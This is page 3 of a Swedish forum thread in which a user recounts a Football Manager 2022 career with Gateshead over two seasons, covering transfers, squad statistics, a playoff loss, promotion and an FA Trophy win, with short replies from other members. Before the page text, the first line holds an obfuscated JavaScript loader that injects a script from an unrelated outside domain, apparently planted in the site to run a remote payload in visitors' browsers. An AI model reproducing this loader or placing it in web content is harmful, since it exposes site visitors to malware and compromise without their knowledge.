;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM22] Styrkeprovet – Sida 3 – Rapporter – FMSweden Forum
Meny Stäng

[FM22] Styrkeprovet
 
Share:
Notifications
Clear all

[FM22] Styrkeprovet

53 Inlägg
6 Users
80 Reactions
2,665 Visningar
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2026/27
Vanarama National League
Del 1, Säsong 6, Avsnitt 2 – Första tredjedelen

Vi inledde starkt, visst vi gjorde ett par rätt dåliga förluster men vi hängde på i den ”normala” toppen. Jag säger ”normala” för Solihull Moors verkade ha besökt ett vägskäl vid midnatt, förutom det oavgjorda resultatet vi tvingade dem till så var det uteslutande vinster tills tionde omgången när de återigen spelade lika.

Att vi vågade lita på Jack Page i buren verkar ha gett resultat, då han presterat mycket bättre både på matcherna och träningarna. Solihull tappade något i ligan, men är alltjämt etta, och vi samt ett antal andra klubbar kunde minska avståndet.

Ut:
 D/WB/M/AML Damian Roberts, 18år, Lån, Curzon Ashton
 D/WBL David Daws, 18år, Lån, Barrow
Kommentar: Bägge dessa herrar lånas ut för att få speltid, kommer förhoppningsvis att utmana om en startplats nästa år.


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2026/27
Vanarama National League
Del 1, Säsong 6, Avsnitt 3 – Andra tredjedelen

Vi hade en tuffare del av vårat spelschema, idel toppklubbar, det gjordes inte lättare av landslagsuppkallningar, i matchen mot Chesterfield så hade vi faktiskt hela sju spelare borta. Sangaré som enda senior, men att Haavisto fick åka med Finlands U19, och dessutom gjorde mål i debuten, det var roligt. När spelarna kom tillbaka så gick vi dock som tåget.

Försvaret satt sig ordentligt efter vår ”hemvändare” anlänt, och det var inte många mål som letade sig in i maskorna, det fick oss att klättra i det numera högst aktiva titelracet. Även om Solihull fortfarande har greppet om förstaplatsen, då de har spelat färre matcher, så måste man säga att det är otroligt jämnt just nu.

In:
 DC Ollie Younger, 27år, 184SM, 13GM, 7.07AVR, 67.5Kkr, Bradford City
Kommentar: Spelat 19 matcher för Bradford i League 1 sedan han lämnade Gateshead för 150K, fanns väl inget dunderbehov av en mittback men när han transferlistades och dessutom ville till oss så högg vi. Är absolut tillräckligt bra för att spela och dessutom en ledare med rutin, något vi eftersökt. Så vi är mycket glada av att ha Younger tillbaka.

Ut:
 D/WB/MR Sky Sinclair, 24år, 120SM, 3GM, 6.99AVR, 180-215Kkr, Shrewsbury
 DRL Jason Tozer, 19år, 2SM, 6.7AVR, Lån, Dartford
 GK Emmanuel Yahaya, 20år, 1SM, 0IM/M, Avslutat Lån
Kommentar: Sinclair går till League 1, förmodligen som backup, inga stora pengar men vi stod lite tveksamma om vi skulle förlänga hans kontrakt överhuvudtaget, men vi får inte glömma hur viktig han varit de senaste tre säsongerna. Tozer var för säsongen utlånad till just Dartford och eftersom ingen försäljning verkade möjlig så lät vi honom gå tillbaka ännu ett år. Page var ganska snabb med att visa att han var en målvakt att satsa på så tyvärr kom Yahaya i kläm.


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2026/27
Vanarama National League
Del 1, Säsong 6, Avsnitt 4 – Tredje tredjedelen

Fantastiskt nog så har vi fått tillbaka vår favorit Pani, och det för halva priset mot vad de betalade. Vi gjorde efter det en väldigt bra februari där vi bara tappade två poäng, tyvärr så lyckades Solihull ändå fem poäng bättre. Sangaré blev tyvärr skadad, men vi rullade på hyfsat och lyckades i alla fall få till ett ersättningslån.

Vi kvalificerade oss för kvalet med fem matcher kvar men som tvåa låg vi dock nio poäng efter Solihull och resten av säsongen var mest att spela av. Nåväl, vi gjorde det med den äran och slutade som tvåa. FA Trophy slutade i år i semifinalen, nu gör vi oss klara för ett kval som aldrig förr. Även om vi kanske avslutade något svagt.

In:
 MC Connor Pani, 23år, 210SM, 28GM, 7.09AVR, 1.05Mkr, Accrington Stanley
 AMRL/ST Enock Asante, 25år, Lån, Leyton Orient
Kommentar: Ja vår favorit är tillbaka efter ett halvår i League 1, tolv inhopp med dåligt resultat räckte varken för för Pani eller för Accrington och vi har gjort ett ekonomiskt genidrag, vi fick dessutom ner hans lön gentemot innan han lämnade. Asante in på lån för att ersätta skadade Sangaré.

Ut:
 DM/MC Toby Stephens, 24år, 200SM, 11GM, 7.01AVR, 0kr, Rochdale
 D/DM/MC Max Bruns-Bockholt, 19år, 11SM, 6.89AVR, 1.25Mkr, Nottm Forest
 DRLC Nathan Jones, 21år, 7SM, 6.80AVR, Lån, Alfreton Town
Kommentar: Speltiden har varit knaper i år för Stephens och med ett utgående kontrakt så lät vi denne trotjänare gå gratis till League 2 medans fönstret fortfarande var öppet. Bruns-Bockholt lämnar lika snabbt som han kom, går till Championship utan egentligen utvecklats något vidare hos oss. Bra peng nu när Younger kommit in i truppen före honom också.


   
TommyE and raca14 reacted
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2026/27
Vanarama National League
Del 1, Säsong 6, Avsnitt 5 – Kvalet

Som tvåa fick vi börja med att ta emot Ebbsfleet på hemmaplan, och ett tidigt mål från Pani gjorde att vi kunde kontrollera matchen, trots att de fick till en kvittering så var vi aldrig oroliga och kunde sätta segermålet några minuter senare.

Southend på Wembley i finalen, ett lag vi inte vunnit mot på de sju senaste matcherna, inte det bästa möjliga motståndet alltså. Vi tog dock tag i taktpinnen och hade ett tidigt skott som visslade förbi precis utanför stolpen. I sanning borde vi haft en komfortabel ledning efter första halvleken, men 0-0 var allt vi kom in i omklädningsrummet med. Andra halvlek var vi kanske det sämre laget men 0-0 stod sig. I minut 91 fick vi dock ett direkt rött men vi tog oss till övertid, vilken blev händelselös och vi stod återigen en straffläggning ifrån League 2. Misär igen dock, otroligt att man komma så nära två år i rad.


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2026/27
Vanarama National League
Del 1, Säsong 6, Avsnitt 6 – Säsongssummering

Bästa säsongen vi gjort hittills, 96 poäng i National League, fantastiskt, och bara en gång under spelets sex säsonger tidigare så hade det inte räckt till förstaplatsen. Page höll nollan 22 gånger i ligan, vi släppte bara in 37 mål. Jag tycker vi förtjänade en uppflyttning, men i slutändan räckte det inte till.

Nästa säsong tar vi nya tag, några spelare kommer lämna, men i nuläget är det Cullinan som redan ses som fjärdeval som är det största namnet. Det verkar som ordföranden förväntar sig uppflyttning nästa år för att därefter sälja klubben, vi får se om det är en plan som går att uppfylla.

Vanarama National League: Tvåa(+4)
FA Cupen: Första omgången
FA Trophy: Semifinal

Årets spelare: Marc Frame: Gjorde flest matcher av alla utespelare i år, 14 mål och med bra resultat från bägge kanterna har han varit viktig vecka in och ut.
Årets värvning: Connor Pani: Att vi fick tillbaka honom så snabbt gjorde mig otroligt glad och han fick ändå in 17 matcher för oss i år.
Årets Gatesheadare: Topias Haavisto: Även om han fortfarande inte är något dunderlöfte så bidrog han i år med ett mål vilket är bra för då 16-årig grabb.

Lag vi vill vara bättre än:
Newcastle: Premier League 11:e(-4)
Sunderland: Championship 15:e(+12)
Middlesbrough: Championship 19:e(-1)
Hartlepool: National League 7:e(-7)
York: National League North 5:e(+1)
South Shields: National League North 6:e(-4)
Darlington: National League North 13:e
Spennymoor: National League North 17:e(-10)
Blyth: National League North 21:e Nedflyttade


   
TommyE reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

Otroligt att knipa nästan 100 pinnar och ändå inte nå avancemang. Fortsätt kriga på!


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  
Postad av: @argt-troll

Otroligt att knipa nästan 100 pinnar och ändå inte nå avancemang. Fortsätt kriga på!

Taack, jo det var ganska surt faktisk, men det är lika roligt ändå


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2027/28
Vanarama National League
Del 1, Säsong 7, Avsnitt 1 – Försäsongen

Inför säsongen så lyckades jag övertala styrelsen att uppgradera träningsanläggningen, vilket jag hoppats på länge. I år åkte vi 8km på träningsläger till Newcastle, 450Kkr gick det på. Man är fortsatt bestämda med att vi ska klara av att bli uppflyttade i år. Jag håller dock med om att laget nog är det bästa vi haft.

Vi har dock ett stort, stort, behov av att tunna ut truppen, då vi bara har ett A-lag och ett U18-lag. Vilket gör att jag kommer jag kommer vara villig att släppa åtminstone 10 spelare till under säsongen, 4 av vilka jag redan bestämt mig för. Det är dock väldigt roligt att vi nu står med tre spelare med över 200 matcher för mig.

In:
 D/DM/M/AMC Jack Nisbet, 18år, 0kr, Southampton
 DM/M/AMC Anthony Rampersad, 18år, 0kr, Man Utd
 AMR Florian Hoffmann, 18år, 0kr, Southampton
 D/WBL Drew Finley, 17år, 0kr, Man Utd
 DLC Lewis Sullivan, 18år, 0kr, Man Utd
 M/AMR/ST Graham Cull, 18år, 0kr, Liverpool
 ST Martin Alderton, 17år, 0kr, Man Utd
 DRC Chris Moseley, 18år, 0kr, Liverpool
 DRL Ryan Warnock, 17år, 0kr, Liverpool
 D/DM/MC Daniel Todd, 18år, 0kr, Newcastle
 DM/MC Harry Newton, 17år, Uppflyttad U18
 DRL/AML Gabriele Vermeulen, 19år, Uppflyttad U18
 M/AMC Derek O'Connor, 19år, Uppflyttad U18
 GK Emmanuel Elijah, 18år, 0kr, Aston Villa
Kommentar: Håll ögon på Lewis Sullivan, han räknas redan som klubbens bästa spelare, och mina scouter säger att han kommer bli en Premier League spelare, så att vi fick in honom är otroligt, visserligen har vi lovat honom 50% av en försäljning. I övrigt är det bra lovande spelare vi hittat. Newton flyttas upp efter ett lyckat lån i Vanarama North, Vermeulen och O'Connor var för gamla för U18 men förväntas inte göra några framträdanden.

Ut:
 AMRLC Marc Frame, 19år, 178SM, 32GM, 6.89AVR, Avslutat Lån
 DC Harvey Cullinan, 24år, 171SM, 10GM, 6.87AVR, 0kr, Drogheda United
 DRC/WBR Sion Delve, 21år, 122SM, 6GM, 6.92AVR, Avslutat Lån
 DL Rhys Davies, 21år, 95SM, 2GM, 6.78AVR, 1Mkr, Portsmouth
 DLC Matt Lycett, 20år, 43SM, 6.70AVR, 95Kkr, Cambridge United
 MRL/AMRLC/ST Craig Tanner, 32år, 16SM, 2GM, 6.88AVR, Lägger av
 AMRL/ST Shamir Mullings, 33år, 15SM, 4GM, 6.92AVR, Fri Transfer
 MR/AMRL/ST Enock Asante, 25år, 10SM, 1GM, 6.87AVR, Avslutat Lån
 DRL Jason Tozer, 20år, 2SM, 6.7AVR, 0kr, Inverness
 M/AMC Paul Simpson, 30år, 1SM, 6.7AVR, Fri Transfer
Kommentar: Är väl bara Frame som kommer saknas på riktigt här, men vi behövde dels göra plats för nyförvärv men framförallt så ville vi dra in lite kosing och dra ner på kostnaderna nu när de investerat i en ny träningsanläggning.

Startelva:
Målvakter: (Land, Namn, Ålder, SM, HN, IM/M, Sty, ÖF, Moderklubb)
 Steve Arnold, 37år, 2, 0, 2.5, 5, 6.71(-0.43), Norwich
 Jack Page, 21år, 71, 30, 0.82, 14(+2), 10.29(+0.72), Southampton
 George O'Neill, 20år, 2, 1, 0.5, 8, 8.14(-0.15), West Brom
 Emmanuel Elijah, 18år, 0, 0, 0, 8, 11.14, Aston Villa
Kommentar: Jack Page utvecklades fint förra året och jag har absolut inget emot att ställa honom i buren igen, Elijah kommer in för att främst ersätta O'Neill som inte riktigt tränat bra.

Backlinjen: (Land, Namn, Ålder, SM, GM, SB, Sty, ÖF, Moderklubb)
 Ollie Younger, 27år, 213, 18, 7.06, 13, 10.71(+0.28), Burnley
 Kevin Petö, 19år, 19, 0, 6.92, 11, 11.57(+0.14), Newcastle
 Chris Moseley, 18år, 0, 0, 0, 12, 13.29, Liverpool
 Nathan Jones, 21år, 7, 0, 6.80, 11, 9.43(+0.14), Wolves
 Ryan Warnock, 18år, 0, 0, 0, 10, 12.14, Liverpool
 Lewis Sullivan, 18år, 0, 0, 0, 10, 12.14, Man Utd
 James Kaloczi, 32år, 1, 0, 6.6, 9, 10.29, Boreham Wood
 Michael Miller, 32år, 4, 0, 7.05, 11, 8.43, Celtic
 David Daws, 19år, 0, 0, 0, 10, 12.43(+0.72), Man Utd
 Drew Finley, 18år, 0, 0, 0, 10, 13.86, Man Utd
 Kevin Murray, 20år, 57, 0, 6.98, 13, 12, Brighton
 Gabriele Vermeulen, 19år, 0, 0, 0, 8, 10, Gateshead
Kommentar: Mycket stabil lagdel, även om vi tappat mycket rutin här sedan förra året, så Younger kommer vara viktig och om han håller sig hel så kan vi nog bli svårmutade även i år.

Mittfältet: (Land, Namn, Ålder, SM, GM, SB, Sty, ÖF, Moderklubb)
 Andy Chandler, 20år, 28, 0, 6.86, 8, 9.86(+0.29), Gateshead
 Jack Nisbet, 18år, 0, 0, 0, 8, 11, Southampton
 Daniel Todd, 18år, 0, 0, 0, 8, 10.57, Newcastle
 Danny Greenfield, 26år, 232, 9, 6.91, 9, 11.43, Barnsley
 George Abbot, 21år, 80, 2, 6.84, 11(+1), 11(+0.43), Tottenham
 Dean Lefevre, 21år, 123, 5, 6.94, 11, 11.86(-0.14), Leicester
 Anthony Rampersad, 18år, 0, 0, 0, 7, 10.14, Man Utd
 Harry Newton, 18år, 0, 0, 0, 11, 11.14, Gateshead
 Connor Pani, 23år, 227, 29, 7.08, 10, 13(+0.29), Gateshead
 Felix Weber, 19år, 29, 3, 7.02, 9(+1), 12.29(+0.58), Leicester
 Nnaemeka Chukwuka, 19år, 20, 5, 6.99, 9(+1), 13.43(+0.29), Man City
 Derek O'Connor, 19år, 0, 0, 0, 6, 9.57, Gateshead
 Grzegorz Kowalski, 20år, 74, 8, 7.01, 8, 11.71(+0.42), Leicester
Kommentar: En väldigt bra lagdel med mycket rutin och som har gjort det bra de senaste åren, tyvärr har vi samlat på oss lite för många bänkspelare här, även om vi ska räkna bort de tre egna produkterna så är det 10 spelare på 3 platser.

Anfall/yttrar: (Land, Namn, Ålder, SM, GM, SB, Sty, ÖF, Moderklubb)
 Damian Roberts, 19år, 0, 0, 0, 10(+3), 12.29(+0.29), Arsenal
 Graham Cull, 18år, 0, 0, 0, 8, 11, Liverpool
 Leon Irons, 21år, 23, 1, 6.79, 11, 12.86(+0.29), Everton
 Florian Hoffmann, 18år, 0, 0, 0, 6, 11, Southampton
 Dan Rhodes, 20år, 73, 14, 7.04, 11, 13(+0.86), Everton
 Florin Botea, 19år, 18, 3, 6.63, 11(+1), 8.71(+0.14), Kettering Town
 Topias Haavisto, 17år, 11, 1, 6.71, 5, 8.57(+0.14), Gateshead
 Faisu Sangaré, 24år, 222, 67, 6.85, 16, 11.14(+0.14), Oldham
 Martin Alderton, 18år, 0, 0, 0, 14, 10.57, Man Utd
Kommentar: Vi har lite problem med att ställa upp någon på vänsterkanten men om någon bara kan kliva fram så kommer det här kunna bli riktigt bra även framåt.

Klubbstatistik
Lagstyrka : 9.74(+0.05)
Lagstyrka i division: 2'a(+1)
Lag övrig fysik: 11,02(+0.21)
Lag övrig fysik i division: 8.71(+2.86)
Bankbalans: 4(-19.6) Mkr
Omsättning: 28.5(-7) Mkr


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2027/28
Vanarama National League
Del 1, Säsong 7, Avsnitt 2 – Första tredjedelen

Vi inledde med fem raka vinster utan att släppa in ett enda mål, därefter följde en vinst till och därefter våra första poängtapp i två 0-0 matcher, den här starten ledde såklart att vi seglade upp i topp, även om vi inte fick något avstånd till konkurrenterna.

Vi haltade till lite, och det som var särdeles snöpligt var att vi förlorade en tidig seriefinal mot Chesterfield, där vi blev förpassade ner till andraplatsen. Den förlusten verkade dock ge oss vatten på kvarnen och vi har vunnit samtliga matcher sedan dess och är åter etta på målskillnad.

Ut:
 DM/MC George Abbot, 22år, 80SM, 2GM, 6.84AVR, 95Kkr, Rochdale
 MC/AMRLC Grzegorz Kowalski, 20år, 74SM, 8GM, 7.01AVR, 770Kkr, Huddersfield
 M/AML Leon Irons, 21år, 25SM, 1GM, 6.81AVR, Lån, Farsley
 DRLC Nathan Jones, 21år, 7SM, 6.80AVR, 28Kkr, Curzon Ashton
 GK George O'Neill, 20år, 2SM, 1HN, 0.5IM/M, 87.5Kkr, Millwall
 DM/M/AMC Anthony Rampersad, 18år, 1SM, 6.5AVR, Lån, Curzon Ashton
Kommentar: Vi tunnade ut truppen så gott vi kunde, och om vi bortser från Rampersad, som bara försvinner över säsongen, så handlar det om spelare som inte riktigt lyckats slå sig in i förstaelvan.


   
TommyE reacted
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2027/28
Vanarama National League
Del 1, Säsong 7, Avsnitt 3 – Andra tredjedelen

I Gateshead rullade fotbollen på, i kampen om förstaplatsen så såg dock några förluster till att vi var andramän, även FA cupen föll vi tidigt i efter en tuff lottning. Det här var en lustig period där vi antingen vann matcherna utan att släppa in något mål eller förlorade utan att göra ett enda mål, vet inte riktigt vad det berodde på.

Klubben blev uppköpt av lokala affärsmän, vilket ledde att vi faktiskt fick lite över en miljon inskjutet i kassan, inga Newcastle-pengar, men på hela så verkar det som att ägarbytet inte kommer ändra något åt det negativa hållet i alla fall. Vi fortsatte vinna ända tills vi hade chansen att kliva upp i ledning igen, då klarade vi inte riktigt pressen. Vi ska också passa på att hylla Sangaré som redan passerat sin bästa målskörd för någon säsong i sin karriär.

In:
 DC Callum Cook, 18år, Lån, Middlesbrough
 DRLC Gruffudd Eden, 19år, Lån, Wrexham
Kommentar: Cook är en spelare som Middlesbrough stal från ungdomsverksamhet och nu när vi har chansen så tar vi en extra titt på honom, om han är något värt att försöka värva tillbaka eller inte. Eden kommer för att ta en mer aktiv roll i backlinjen, då vi behöver fylla på här.

Ut:
 DC Ollie Younger, 28år, 236SM, 19GM, 7.08AVR, 100Kkr, Burton Albion
 D/WBL David Daws, 20år, 10SM, 7.09AVR, 1Mkr, Norwich
 DLC Lewis Sullivan, 19år, 6SM, 6.82AVR, 1.4Mkr, Bristol City
Kommentar: Younger gick inte att stoppa och lämnar återigen efter blott ett år för oss, antagligen för sista gången nu då. Sullivan som vi hoppats så mycket på hade stora skadebekymmer under hösten och lyckades aldrig hitta formen emellan skadorna, dessutom kunde vi inte komma överens om någon förlängning av hans ettårskontrakt. Daws tyckte vi att buden var tillräckligt bra på, men med tanke på hur många klubbar som var villiga att buda den summan så har vi antagligen gjort en felbedömning här.


   
raca14 reacted
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2027/28
Vanarama National League
Del 1, Säsong 7, Avsnitt 4 – Tredje tredjedelen

Vi drabbades av stora skadeproblem på mittfältet, eller centrerade runt vårt mittfält, vi hade ju såklart fler skador på över en månad än den nästmest drabbade klubben hade i korta skador. Vi lyckades dock hålla igång spelet och tog hem seriefinalen mot Chesterfield den här gången och gick upp i ledning.

Det var fortsatt vi och Chesterfield som kämpade om förstaplatsen, och det såg ut att bli den hårdaste kampen någonsin, även om vi skaffat oss ett trepoängsförsprång. Det var också vi båda som bokade finalplatserna i FA Trophy, det fortsatte hårt hela vägen till sista matchen där vi behövde tre poäng för att garantera förstaplatsen. Det blev bara lika, men det räckte ändå och vi är i League 2.

Ut:
 Chris Moseley, 18år, 27SM, 1GM, 6.89AVR, 2.1Mkr, Birmingham
 MR/AMRL/ST Graham Cull, 18år, 22SM, 1GM, 6.84AVR, 1.5Mkr, Nottm Forest
 DRL Ryan Warnock, 18år, 17SM, 6.96AVR, 1.5Mkr, Peterborough
Kommentar: Cull, Moseley och Warnock är alla tre tråkiga att förlora då de är lovande, men vi behöver pengarna och de stannar på lån säsongen ut, en perfekt lösning.


   
raca14 reacted
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2027/28
Vanarama National League
Del 1, Säsong 7, Avsnitt 5 – Finalen

Vi ställdes som sagt emot Chesterfield, som trots att de plockat 100 poäng inte lyckades gå upp efter att ha förlorat en straffläggning. De senaste fyra åren så har faktiskt samtliga kvalfinaler fått avgöras på straffar. Vi antog att de var sugna på revansch. Första halvlek blev sen sådan tråkig affär som bara hypeade finaler blir, men direkt i andra så drog Chesterfield upp takten och satte ett snabbt mål, efter en försvarsmiss. Ett mål som såg ut att stå, men så i slutminuterna kontrade vi in en pyts och tog det till övertid. En övertid vi fick spendera i egen halvlek, efter vi gått ner till tio man på grund av skada, men vi kom till straffläggning. Jack Page blev hjälte med två räddningar. Hurra! Gateshead tar hem sin andra FA Trophy och dagen innan på samma arena så tog Newcastle hem FA cupen, bra resultat för oss svartvita i nordöst.


   
Kristijan and raca14 reacted
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 3 år sedan
Inlägg: 49
Topic starter  


Gateshead 2027/28
Vanarama National League
Del 1, Säsong 7, Avsnitt 6 – Säsongssummering

Vi tog alltså hem en av Englands minsta dubblar. Utan tvekan så ska vi tacka Jack Page, han höll nollan 27 av 42 matcher i ligan, och släppte bara 22 bollar bakom sig. Andramålvakten Elijah höll nollan i tre av fyra och släppte bara ett mål. Vilket fick oss att stanna på blott 23 insläppta mål på en hel säsong, helt fantastiskt. Även Sangaré trots att han inte mäktat mycket på slutet kom han upp i 19 ligamål.

Inför nästa säsong så står vi lite frågande över hur mycket vi bör förstärka. De flesta nyuppflyttade lagen till League 2 har trillat ned igen inom några säsonger, däremot så nådde Southend hela vägen till en femteplats i år utan att göra dunderförstärkningar. Styrelsen vill dock ha övre halvan i nuläget, men det kan inte tänka mig är kvar när serien lottats annars kan jag få problem. För jag vill mest hålla mig kvar.

Vanarama National League: Etta(+1) Uppflyttade
FA Cupen: Första omgången
FA Trophy: Segrare!

Årets spelare: Jack Page: Har varit en supergoalie i år, totalt 28 hållna nollar, har dessutom haft fin utveckling på träningsanläggningen och anses vara vår bästa spelare nu.
Årets värvning: Florian Hoffmann: Egentligen så värvades Florian mest som en backup på chans, men när skadorna kom så klev han fram ordentligt och jag har nu lyxproblem på högerkanten.
Årets Gatesheadare: Connor Pani: Pani har återigen gjort en bra säsong för oss, han kom också tillbaka starkt från en axel ur led och är den egna produkt som spelat regelbundet.

Lag vi vill vara bättre än:
Newcastle: Premier League 5:e(+6)
Sunderland: Championship 5:e(+10)
Middlesbrough: Championship 14:e(+5)
Hartlepool: National League 17:e(-10)
South Shields: National League North 2:a(+4)
York: National League North 7:e(-2)
Darlington: National League North 13:e
Spennymoor: National League North 16:e(+1)
Blyth: Evo-Stik League Premier Division


   
SvaraCitera
Sida 3 / 3
Share: